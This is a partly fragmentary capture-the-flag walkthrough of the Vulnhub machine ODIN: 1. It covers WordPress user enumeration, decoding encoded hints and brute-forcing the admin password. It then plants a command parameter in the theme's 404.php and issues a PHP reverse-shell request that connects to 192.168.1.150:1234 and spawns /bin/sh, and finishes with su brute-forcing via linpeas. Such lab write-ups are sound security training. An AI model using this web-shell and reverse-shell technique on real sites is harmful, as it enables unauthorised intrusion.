Odin ventured to the Well of Mimir, near Jötunheim, the land of the giants in the guise of a walker named Vegtam. Mímir, who guarded the well, to allow him to drink from it, asked him to sacrifice his left eye, this being a symbol of his will to obtain knowledge
This is ODIN: 1 from Vulnhub.
Just another Joomla site
But that’s a little joke because it’s actually wordpress.
root@kali:/opt/vulnhub/odin# wpscan -e --url http://odin
wp-scan only finds a user called ‘odin’, but trying to login at wp-admin with any random password gives an error:
Unknown username. Check again or try your email address.
So that’s curious. What if we try admin?
Error: The password you entered for the username admin is incorrect
Right. So admin exists; odin does not. What’s up with that, wp-scan? Lol.
We also have some encoded strings on the blog:
NB2HI4DTHIXS6Z3JORUHKYROMNXW2L3EMFXGSZLMNVUWK43TNRSXEL2TMVRUY2LTORZS6YTMN5RC 63LBON2GK4RPKBQXG43XN5ZGI4ZPJRSWC23FMQWUIYLUMFRGC43FOMXXE33DNN4W65JOOR4HILTU MFZC4Z32EBZG6Y3LPFXXKIDONFRWKIDXN5ZGI3DJON2AU===
This is base32:
https://github.com/danielmiessler/SecLists/blob/master/Passwords/Leaked-Databases/rockyou.txt.tar.gz rockyou nice wordlist
We have this:
Which is base64:
If you look closely, you won’t need it here
Which appears to be brainf^%k, which translates to:
Which never appears to be useful.
So a password attack on admin? Yes.
One of the blog posts is called:
Twenty Twenty: 404 Template (404.php)
Wonder if that is a hint?
We can edit the file here:
into the upper part of the file beneath the opening html tag. We can then access the file at:
And issue commands. Like a shell. Like this:
GET /wp-content/themes/twentytwenty/404.php?cmd=php+-r+'$sock%3dfsockopen("192.168.1.150",1234)%3bexec("/bin/sh+-i+<%263+>%263+2>%263")%3b' HTTP/1.1
On the box
We can login to mysql with joomla:joomla and grab some hashes but they don’t want to break easily, but there is a shortcut here. Linpeas has a mode (-a) that will brute force su. And we have weak passwords:
So really that’s it; let’s check it: